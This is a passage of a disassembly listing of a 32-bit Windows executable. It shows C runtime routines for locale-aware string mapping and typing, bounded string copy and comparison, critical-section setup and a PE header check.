push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41D130 ; LCMapStringA
mov esi, eax
loc_40C2C4: ; CODE XREF: sub_40BF57+2B1�j
; sub_40BF57+351�j
cmp [ebp+var_C], ebx
jz short loc_40C2D2
push [ebp+var_C]
call sub_403603
pop ecx
loc_40C2D2: ; CODE XREF: sub_40BF57+370�j
mov eax, [ebp+var_10]
cmp eax, ebx
jz short loc_40C2E5
cmp [ebp+arg_10], eax
jz short loc_40C2E5
push eax
call sub_403603
pop ecx
loc_40C2E5: ; CODE XREF: sub_40BF57+380�j
; sub_40BF57+385�j
mov eax, esi
loc_40C2E7: ; CODE XREF: sub_40BF57+232�j
; sub_40BF57+26A�j
lea esp, [ebp-20h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402710
leave
retn
sub_40BF57 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C2F9 proc near ; CODE XREF: sub_404816+B6�p
; sub_404816+DB�p ...
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_40271F
push [ebp+arg_20]
lea ecx, [ebp+var_10]
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40BF57
add esp, 20h
cmp [ebp+var_4], 0
jz short locret_40C33A
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40C33A: ; CODE XREF: sub_40C2F9+38�j
leave
retn
sub_40C2F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C33C proc near ; CODE XREF: sub_40C4F4+29�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, dword_426414
push ebx
push esi
xor ebx, ebx
cmp eax, ebx
push edi
mov edi, ecx
jnz short loc_40C395
lea eax, [ebp+var_8]
push eax
xor esi, esi
inc esi
push esi
push offset dword_41DC3C
push esi
call ds:dword_41D124 ; GetStringTypeW
test eax, eax
jz short loc_40C37B
mov dword_426414, esi
jmp short loc_40C3AF
; ---------------------------------------------------------------------------
loc_40C37B: ; CODE XREF: sub_40C33C+35�j
call ds:dword_41D0F0 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_40C390
push 2
pop eax
mov dword_426414, eax
jmp short loc_40C395
; ---------------------------------------------------------------------------
loc_40C390: ; CODE XREF: sub_40C33C+48�j
mov eax, dword_426414
loc_40C395: ; CODE XREF: sub_40C33C+1D�j
; sub_40C33C+52�j
cmp eax, 2
jz loc_40C46D
cmp eax, ebx
jz loc_40C46D
cmp eax, 1
jnz loc_40C497
loc_40C3AF: ; CODE XREF: sub_40C33C+3D�j
cmp [ebp+arg_10], ebx
mov [ebp+var_8], ebx
jnz short loc_40C3BF
mov eax, [edi]
mov eax, [eax+4]
mov [ebp+arg_10], eax
loc_40C3BF: ; CODE XREF: sub_40C33C+79�j
mov esi, ds:dword_41D0A0
xor eax, eax
cmp [ebp+arg_18], ebx
push ebx
push ebx
push [ebp+arg_8]
setnz al
push [ebp+arg_4]
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_10]
call esi ; MultiByteToWideChar
mov edi, eax
cmp edi, ebx
jz loc_40C497
jle short loc_40C42A
cmp edi, 7FFFFFF0h
ja short loc_40C42A
lea eax, [edi+edi+8]
cmp eax, 400h
ja short loc_40C414
call sub_4104B0
mov eax, esp
cmp eax, ebx
jz short loc_40C428
mov dword ptr [eax], 0CCCCh
jmp short loc_40C425
; ---------------------------------------------------------------------------
loc_40C414: ; CODE XREF: sub_40C33C+C3�j
push eax
call sub_4036E0
cmp eax, ebx
pop ecx
jz short loc_40C428
mov dword ptr [eax], 0DDDDh
loc_40C425: ; CODE XREF: sub_40C33C+D6�j
add eax, 8
loc_40C428: ; CODE XREF: sub_40C33C+CE�j
; sub_40C33C+E1�j
mov ebx, eax
loc_40C42A: ; CODE XREF: sub_40C33C+B0�j
; sub_40C33C+B8�j
test ebx, ebx
jz short loc_40C497
lea eax, [edi+edi]
push eax
push 0
push ebx
call sub_407B70
add esp, 0Ch
push edi
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call esi ; MultiByteToWideChar
test eax, eax
jz short loc_40C461
push [ebp+arg_C]
push eax
push ebx
push [ebp+arg_0]
call ds:dword_41D124 ; GetStringTypeW
mov [ebp+var_8], eax
loc_40C461: ; CODE XREF: sub_40C33C+112�j
push ebx
call sub_40BF3C
mov eax, [ebp+var_8]
pop ecx
jmp short loc_40C4E2
; ---------------------------------------------------------------------------
loc_40C46D: ; CODE XREF: sub_40C33C+5C�j
; sub_40C33C+64�j
xor esi, esi
cmp [ebp+arg_14], ebx
jnz short loc_40C47C
mov eax, [edi]
mov eax, [eax+14h]
mov [ebp+arg_14], eax
loc_40C47C: ; CODE XREF: sub_40C33C+136�j
cmp [ebp+arg_10], ebx
jnz short loc_40C489
mov eax, [edi]
mov eax, [eax+4]
mov [ebp+arg_10], eax
loc_40C489: ; CODE XREF: sub_40C33C+143�j
push [ebp+arg_14]
call sub_4102B0
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_40C49B
loc_40C497: ; CODE XREF: sub_40C33C+6D�j
; sub_40C33C+AA�j ...
xor eax, eax
jmp short loc_40C4E2
; ---------------------------------------------------------------------------
loc_40C49B: ; CODE XREF: sub_40C33C+159�j
cmp eax, [ebp+arg_10]
jz short loc_40C4BE
push ebx
push ebx
lea ecx, [ebp+arg_8]
push ecx
push [ebp+arg_4]
push eax
push [ebp+arg_10]
call sub_4102F7
mov esi, eax
add esp, 18h
cmp esi, ebx
jz short loc_40C497
mov [ebp+arg_4], esi
loc_40C4BE: ; CODE XREF: sub_40C33C+162�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+arg_14]
call ds:dword_41D128 ; GetStringTypeA
cmp esi, ebx
mov edi, eax
jz short loc_40C4E0
push esi
call sub_403603
pop ecx
loc_40C4E0: ; CODE XREF: sub_40C33C+19B�j
mov eax, edi
loc_40C4E2: ; CODE XREF: sub_40C33C+12F�j
; sub_40C33C+15D�j
lea esp, [ebp-14h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402710
leave
retn
sub_40C33C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C4F4 proc near ; CODE XREF: sub_404816+96�p
; sub_40CA44+83�p
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_40271F
push [ebp+arg_1C]
lea ecx, [ebp+var_10]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40C33C
add esp, 1Ch
cmp [ebp+var_4], 0
jz short locret_40C532
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40C532: ; CODE XREF: sub_40C4F4+35�j
leave
retn
sub_40C4F4 endp
; =============== S U B R O U T I N E =======================================
sub_40C534 proc near ; CODE XREF: sub_404E21+E9�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_40C6C2
push dword ptr [esi+4]
call sub_403603
push dword ptr [esi+8]
call sub_403603
push dword ptr [esi+0Ch]
call sub_403603
push dword ptr [esi+10h]
call sub_403603
push dword ptr [esi+14h]
call sub_403603
push dword ptr [esi+18h]
call sub_403603
push dword ptr [esi]
call sub_403603
push dword ptr [esi+20h]
call sub_403603
push dword ptr [esi+24h]
call sub_403603
push dword ptr [esi+28h]
call sub_403603
push dword ptr [esi+2Ch]
call sub_403603
push dword ptr [esi+30h]
call sub_403603
push dword ptr [esi+34h]
call sub_403603
push dword ptr [esi+1Ch]
call sub_403603
push dword ptr [esi+38h]
call sub_403603
push dword ptr [esi+3Ch]
call sub_403603
add esp, 40h
push dword ptr [esi+40h]
call sub_403603
push dword ptr [esi+44h]
call sub_403603
push dword ptr [esi+48h]
call sub_403603
push dword ptr [esi+4Ch]
call sub_403603
push dword ptr [esi+50h]
call sub_403603
push dword ptr [esi+54h]
call sub_403603
push dword ptr [esi+58h]
call sub_403603
push dword ptr [esi+5Ch]
call sub_403603
push dword ptr [esi+60h]
call sub_403603
push dword ptr [esi+64h]
call sub_403603
push dword ptr [esi+68h]
call sub_403603
push dword ptr [esi+6Ch]
call sub_403603
push dword ptr [esi+70h]
call sub_403603
push dword ptr [esi+74h]
call sub_403603
push dword ptr [esi+78h]
call sub_403603
push dword ptr [esi+7Ch]
call sub_403603
add esp, 40h
push dword ptr [esi+80h]
call sub_403603
push dword ptr [esi+84h]
call sub_403603
push dword ptr [esi+88h]
call sub_403603
push dword ptr [esi+8Ch]
call sub_403603
push dword ptr [esi+90h]
call sub_403603
push dword ptr [esi+94h]
call sub_403603
push dword ptr [esi+98h]
call sub_403603
push dword ptr [esi+9Ch]
call sub_403603
push dword ptr [esi+0A0h]
call sub_403603
push dword ptr [esi+0A4h]
call sub_403603
push dword ptr [esi+0A8h]
call sub_403603
add esp, 2Ch
loc_40C6C2: ; CODE XREF: sub_40C534+7�j
pop esi
retn
sub_40C534 endp
; =============== S U B R O U T I N E =======================================
sub_40C6C4 proc near ; CODE XREF: sub_404E21+64�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40C702
mov eax, [esi]
cmp eax, off_423F38
jz short loc_40C6DE
push eax
call sub_403603
pop ecx
loc_40C6DE: ; CODE XREF: sub_40C6C4+11�j
mov eax, [esi+4]
cmp eax, off_423F3C
jz short loc_40C6F0
push eax
call sub_403603
pop ecx
loc_40C6F0: ; CODE XREF: sub_40C6C4+23�j
mov esi, [esi+8]
cmp esi, off_423F40
jz short loc_40C702
push esi
call sub_403603
pop ecx
loc_40C702: ; CODE XREF: sub_40C6C4+7�j
; sub_40C6C4+35�j
pop esi
retn
sub_40C6C4 endp
; =============== S U B R O U T I N E =======================================
sub_40C704 proc near ; CODE XREF: sub_404E21+43�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40C78B
mov eax, [esi+0Ch]
cmp eax, off_423F44
jz short loc_40C71F
push eax
call sub_403603
pop ecx
loc_40C71F: ; CODE XREF: sub_40C704+12�j
mov eax, [esi+10h]
cmp eax, off_423F48
jz short loc_40C731
push eax
call sub_403603
pop ecx
loc_40C731: ; CODE XREF: sub_40C704+24�j
mov eax, [esi+14h]
cmp eax, off_423F4C
jz short loc_40C743
push eax
call sub_403603
pop ecx
loc_40C743: ; CODE XREF: sub_40C704+36�j
mov eax, [esi+18h]
cmp eax, off_423F50
jz short loc_40C755
push eax
call sub_403603
pop ecx
loc_40C755: ; CODE XREF: sub_40C704+48�j
mov eax, [esi+1Ch]
cmp eax, off_423F54
jz short loc_40C767
push eax
call sub_403603
pop ecx
loc_40C767: ; CODE XREF: sub_40C704+5A�j
mov eax, [esi+20h]
cmp eax, off_423F58
jz short loc_40C779
push eax
call sub_403603
pop ecx
loc_40C779: ; CODE XREF: sub_40C704+6C�j
mov esi, [esi+24h]
cmp esi, off_423F5C
jz short loc_40C78B
push esi
call sub_403603
pop ecx
loc_40C78B: ; CODE XREF: sub_40C704+7�j
; sub_40C704+7E�j
pop esi
retn
sub_40C704 endp
; =============== S U B R O U T I N E =======================================
sub_40C78D proc near ; CODE XREF: sub_409AB4+117�p
; sub_409AB4+139�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
xor ebx, ebx
cmp eax, ebx
push esi
push edi
jz short loc_40C7A2
mov edi, [esp+0Ch+arg_4]
cmp edi, ebx
ja short loc_40C7BD
loc_40C7A2: ; CODE XREF: sub_40C78D+B�j
; sub_40C78D+3A�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_40C7AC: ; CODE XREF: sub_40C78D+69�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_40C7FA
; ---------------------------------------------------------------------------
loc_40C7BD: ; CODE XREF: sub_40C78D+13�j
mov esi, [esp+0Ch+arg_8]
cmp esi, ebx
jnz short loc_40C7C9
loc_40C7C5: ; CODE XREF: sub_40C78D+48�j
mov [eax], bl
jmp short loc_40C7A2
; ---------------------------------------------------------------------------
loc_40C7C9: ; CODE XREF: sub_40C78D+36�j
mov edx, eax
loc_40C7CB: ; CODE XREF: sub_40C78D+44�j
cmp [edx], bl
jz short loc_40C7D3
inc edx
dec edi
jnz short loc_40C7CB
loc_40C7D3: ; CODE XREF: sub_40C78D+40�j
cmp edi, ebx
jz short loc_40C7C5
loc_40C7D7: ; CODE XREF: sub_40C78D+55�j
mov cl, [esi]
mov [edx], cl
inc edx
inc esi
cmp cl, bl
jz short loc_40C7E4
dec edi
jnz short loc_40C7D7
loc_40C7E4: ; CODE XREF: sub_40C78D+52�j
cmp edi, ebx
jnz short loc_40C7F8
mov [eax], bl
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_40C7AC
; ---------------------------------------------------------------------------
loc_40C7F8: ; CODE XREF: sub_40C78D+59�j
xor eax, eax
loc_40C7FA: ; CODE XREF: sub_40C78D+2E�j
pop edi
pop esi
pop ebx
retn
sub_40C78D endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_40C814: ; CODE XREF: .text:0040C821�j
mov al, [edx]
or al, al
jz short loc_40C823
add edx, 1
bts [esp], eax
jmp short loc_40C814
; ---------------------------------------------------------------------------
loc_40C823: ; CODE XREF: .text:0040C818�j
mov esi, [ebp+8]
or ecx, 0FFFFFFFFh
lea ecx, [ecx+0]
loc_40C82C: ; CODE XREF: .text:0040C83C�j
add ecx, 1
mov al, [esi]
or al, al
jz short loc_40C83E
add esi, 1
bt [esp], eax
jnb short loc_40C82C
loc_40C83E: ; CODE XREF: .text:0040C833�j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C846 proc near ; CODE XREF: sub_409AB4+F1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp [ebp+arg_C], ebx
push edi
jnz short loc_40C866
cmp esi, ebx
jnz short loc_40C86A
cmp [ebp+arg_4], ebx
jnz short loc_40C871
loc_40C85F: ; CODE XREF: sub_40C846+4D�j
; sub_40C846+8C�j
xor eax, eax
loc_40C861: ; CODE XREF: sub_40C846+44�j
; sub_40C846+9E�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40C866: ; CODE XREF: sub_40C846+E�j
cmp esi, ebx
jz short loc_40C871
loc_40C86A: ; CODE XREF: sub_40C846+12�j
mov edi, [ebp+arg_4]
cmp edi, ebx
ja short loc_40C88C
loc_40C871: ; CODE XREF: sub_40C846+17�j
; sub_40C846+22�j ...
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_40C87B: ; CODE XREF: sub_40C846+B1�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_40C861
; ---------------------------------------------------------------------------
loc_40C88C: ; CODE XREF: sub_40C846+29�j
cmp [ebp+arg_C], ebx
jnz short loc_40C895
mov [esi], bl
jmp short loc_40C85F
; ---------------------------------------------------------------------------
loc_40C895: ; CODE XREF: sub_40C846+49�j
mov edx, [ebp+arg_8]
cmp edx, ebx
jnz short loc_40C8A0
mov [esi], bl
jmp short loc_40C871
; ---------------------------------------------------------------------------
loc_40C8A0: ; CODE XREF: sub_40C846+54�j
cmp [ebp+arg_C], 0FFFFFFFFh
mov eax, esi
jnz short loc_40C8B7
loc_40C8A8: ; CODE XREF: sub_40C846+6D�j
mov cl, [edx]
mov [eax], cl
inc eax
inc edx
cmp cl, bl
jz short loc_40C8D0
dec edi
jnz short loc_40C8A8
jmp short loc_40C8D0
; ---------------------------------------------------------------------------
loc_40C8B7: ; CODE XREF: sub_40C846+60�j
; sub_40C846+81�j
mov cl, [edx]
mov [eax], cl
inc eax
inc edx
cmp cl, bl
jz short loc_40C8C9
dec edi
jz short loc_40C8C9
dec [ebp+arg_C]
jnz short loc_40C8B7
loc_40C8C9: ; CODE XREF: sub_40C846+79�j
; sub_40C846+7C�j
cmp [ebp+arg_C], ebx
jnz short loc_40C8D0
mov [eax], bl
loc_40C8D0: ; CODE XREF: sub_40C846+6A�j
; sub_40C846+6F�j ...
cmp edi, ebx
jnz short loc_40C85F
cmp [ebp+arg_C], 0FFFFFFFFh
jnz short loc_40C8E9
mov eax, [ebp+arg_4]
push 50h
mov [esi+eax-1], bl
pop eax
jmp loc_40C861
; ---------------------------------------------------------------------------
loc_40C8E9: ; CODE XREF: sub_40C846+92�j
mov [esi], bl
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_40C87B
sub_40C846 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C8F9 proc near ; CODE XREF: sub_40E9C7+32�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_8]
test ebx, ebx
jnz short loc_40C910
xor eax, eax
jmp loc_40C9AA
; ---------------------------------------------------------------------------
loc_40C910: ; CODE XREF: sub_40C8F9+E�j
cmp ebx, 4
push edi
jb short loc_40C98B
lea edi, [ebx-4]
test edi, edi
jbe short loc_40C98B
mov ecx, [ebp+arg_4]
mov eax, [ebp+arg_0]
loc_40C923: ; CODE XREF: sub_40C8F9+66�j
mov dl, [eax]
add eax, 4
add ecx, 4
test dl, dl
jz short loc_40C981
cmp dl, [ecx-4]
jnz short loc_40C981
mov dl, [eax-3]
test dl, dl
jz short loc_40C977
cmp dl, [ecx-3]
jnz short loc_40C977
mov dl, [eax-2]
test dl, dl
jz short loc_40C96D
cmp dl, [ecx-2]
jnz short loc_40C96D
mov dl, [eax-1]
test dl, dl
jz short loc_40C963
cmp dl, [ecx-1]
jnz short loc_40C963
add [ebp+var_4], 4
cmp [ebp+var_4], edi
jb short loc_40C923
jmp short loc_40C9A2
; ---------------------------------------------------------------------------
loc_40C963: ; CODE XREF: sub_40C8F9+58�j
; sub_40C8F9+5D�j
movzx eax, byte ptr [eax-1]
movzx ecx, byte ptr [ecx-1]
jmp short loc_40C9B3
; ---------------------------------------------------------------------------
loc_40C96D: ; CODE XREF: sub_40C8F9+4C�j
; sub_40C8F9+51�j
movzx eax, byte ptr [eax-2]
movzx ecx, byte ptr [ecx-2]
jmp short loc_40C9B3
; ---------------------------------------------------------------------------
loc_40C977: ; CODE XREF: sub_40C8F9+40�j
; sub_40C8F9+45�j
movzx eax, byte ptr [eax-3]
movzx ecx, byte ptr [ecx-3]
jmp short loc_40C9B3
; ---------------------------------------------------------------------------
loc_40C981: ; CODE XREF: sub_40C8F9+34�j
; sub_40C8F9+39�j
movzx eax, byte ptr [eax-4]
movzx ecx, byte ptr [ecx-4]
jmp short loc_40C9B3
; ---------------------------------------------------------------------------
loc_40C98B: ; CODE XREF: sub_40C8F9+1B�j
; sub_40C8F9+22�j
mov ecx, [ebp+arg_4]
mov eax, [ebp+arg_0]
jmp short loc_40C9A2
; ---------------------------------------------------------------------------
loc_40C993: ; CODE XREF: sub_40C8F9+AC�j
mov dl, [eax]
test dl, dl
jz short loc_40C9AD
cmp dl, [ecx]
jnz short loc_40C9AD
inc eax
inc ecx
inc [ebp+var_4]
loc_40C9A2: ; CODE XREF: sub_40C8F9+68�j
; sub_40C8F9+98�j
cmp [ebp+var_4], ebx
jb short loc_40C993
xor eax, eax
loc_40C9A9: ; CODE XREF: sub_40C8F9+BC�j
pop edi
loc_40C9AA: ; CODE XREF: sub_40C8F9+12�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40C9AD: ; CODE XREF: sub_40C8F9+9E�j
; sub_40C8F9+A2�j
movzx eax, byte ptr [eax]
movzx ecx, byte ptr [ecx]
loc_40C9B3: ; CODE XREF: sub_40C8F9+72�j
; sub_40C8F9+7C�j ...
sub eax, ecx
jmp short loc_40C9A9
sub_40C8F9 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_40C9D4: ; CODE XREF: .text:0040C9E1�j
mov al, [edx]
or al, al
jz short loc_40C9E3
add edx, 1
bts [esp], eax
jmp short loc_40C9D4
; ---------------------------------------------------------------------------
loc_40C9E3: ; CODE XREF: .text:0040C9D8�j
mov esi, [ebp+8]
mov edi, edi
loc_40C9E8: ; CODE XREF: .text:0040C9F5�j
mov al, [esi]
or al, al
jz short loc_40C9FA
add esi, 1
bt [esp], eax
jnb short loc_40C9E8
lea eax, [esi-1]
loc_40C9FA: ; CODE XREF: .text:0040C9EC�j
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA00 proc near ; CODE XREF: sub_40565A+93�p
; sub_4069D7+34D�p ...
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
movzx eax, [ebp+arg_0]
mov ecx, [ebp+var_10]
mov ecx, [ecx+0C8h]
movzx eax, word ptr [ecx+eax*2]
and eax, 8000h
cmp [ebp+var_4], 0
jz short locret_40CA34
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40CA34: ; CODE XREF: sub_40CA00+2B�j
leave
retn
sub_40CA00 endp
; =============== S U B R O U T I N E =======================================
sub_40CA36 proc near ; CODE XREF: sub_408E67+6CB�p
; sub_408E67+B85�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_40CA00
pop ecx
pop ecx
retn
sub_40CA36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA44 proc near ; CODE XREF: sub_40565A+32�p
; sub_40A7C0+81�p ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push [ebp+arg_8]
lea ecx, [ebp+var_18]
call sub_40271F
mov ebx, [ebp+arg_0]
lea eax, [ebx+1]
cmp eax, 100h
ja short loc_40CA72
mov eax, [ebp+var_18]
mov eax, [eax+0C8h]
movzx eax, word ptr [eax+ebx*2]
jmp short loc_40CAE7
; ---------------------------------------------------------------------------
loc_40CA72: ; CODE XREF: sub_40CA44+1D�j
mov [ebp+arg_0], ebx
sar [ebp+arg_0], 8
lea eax, [ebp+var_18]
push eax
mov eax, [ebp+arg_0]
and eax, 0FFh
push eax
call sub_40CA00
test eax, eax
pop ecx
pop ecx
jz short loc_40CAA3
mov al, byte ptr [ebp+arg_0]
push 2
mov [ebp+var_8], al
mov [ebp+var_7], bl
mov [ebp+var_6], 0
pop ecx
jmp short loc_40CAAD
; ---------------------------------------------------------------------------
loc_40CAA3: ; CODE XREF: sub_40CA44+4B�j
xor ecx, ecx
mov [ebp+var_8], bl
mov [ebp+var_7], 0
inc ecx
loc_40CAAD: ; CODE XREF: sub_40CA44+5D�j
mov eax, [ebp+var_18]
push 1
push dword ptr [eax+14h]
push dword ptr [eax+4]
lea eax, [ebp+var_4]
push eax
push ecx
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push 1
push eax
call sub_40C4F4
add esp, 20h
test eax, eax
jnz short loc_40CAE3
cmp [ebp+var_C], al
jz short loc_40CADF
mov eax, [ebp+var_10]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40CADF: ; CODE XREF: sub_40CA44+92�j
xor eax, eax
jmp short loc_40CAF7
; ---------------------------------------------------------------------------
loc_40CAE3: ; CODE XREF: sub_40CA44+8D�j
movzx eax, [ebp+var_4]
loc_40CAE7: ; CODE XREF: sub_40CA44+2C�j
and eax, [ebp+arg_4]
cmp [ebp+var_C], 0
jz short loc_40CAF7
mov ecx, [ebp+var_10]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_40CAF7: ; CODE XREF: sub_40CA44+9D�j
; sub_40CA44+AA�j
pop ebx
leave
retn
sub_40CA44 endp
; =============== S U B R O U T I N E =======================================
sub_40CAFA proc near ; CODE XREF: sub_407B19+F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_42641C, eax
retn
sub_40CAFA endp
; ---------------------------------------------------------------------------
loc_40CB04: ; DATA XREF: sub_40CB14:loc_40CB79�o
push dword ptr [esp+4]
call ds:dword_41D120 ; InitializeCriticalSection
xor eax, eax
inc eax
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CB14 proc near ; CODE XREF: sub_405881+26�p
; sub_405934+78�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 14h
push offset dword_421760
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
push dword_42641C
call sub_405193
pop ecx
mov esi, eax
cmp esi, edi
jnz short loc_40CB8A
lea eax, [ebp+var_1C]
push eax
call sub_407906
pop ecx
cmp eax, edi
jz short loc_40CB52
push edi
push edi
push edi
push edi
push edi
call sub_402E3D
add esp, 14h
loc_40CB52: ; CODE XREF: sub_40CB14+2F�j
cmp [ebp+var_1C], 1
jz short loc_40CB79
push offset aKernel32_dll_0 ; "kernel32.dll"
call ds:dword_41D0E4 ; GetModuleHandleA
cmp eax, edi
jz short loc_40CB79
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push eax
call ds:dword_41D0EC ; GetProcAddress
mov esi, eax
cmp esi, edi
jnz short loc_40CB7E
loc_40CB79: ; CODE XREF: sub_40CB14+42�j
; sub_40CB14+51�j
mov esi, offset loc_40CB04
loc_40CB7E: ; CODE XREF: sub_40CB14+63�j
push esi
call sub_405127
pop ecx
mov dword_42641C, eax
loc_40CB8A: ; CODE XREF: sub_40CB14+21�j
mov [ebp+ms_exc.disabled], edi
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; MultiByteToWideChar
mov [ebp+var_20], eax
jmp short loc_40CBC9
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_24], eax
xor ecx, ecx
cmp eax, 0C0000017h
setz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
cmp [ebp+var_24], 0C0000017h
jnz short loc_40CBC5
push 8
call ds:dword_41D174 ; RtlRestoreLastWin32Error
loc_40CBC5: ; CODE XREF: sub_40CB14+A7�j
and [ebp+var_20], 0
loc_40CBC9: ; CODE XREF: sub_40CB14+84�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_20]
call __SEH_epilog4
retn
sub_40CB14 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40CBE0 proc near ; CODE XREF: sub_40CC52+16�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 5A4Dh
jz short loc_40CBEE
loc_40CBEB: ; CODE XREF: sub_40CBE0+19�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40CBEE: ; CODE XREF: sub_40CBE0+9�j
mov eax, [ecx+3Ch]
add eax, ecx
cmp dword ptr [eax], 4550h
jnz short loc_40CBEB
xor ecx, ecx
cmp word ptr [eax+18h], 10Bh
setz cl
mov eax, ecx
retn
sub_40CBE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40CC10 proc near ; CODE XREF: sub_40CC52+27�p
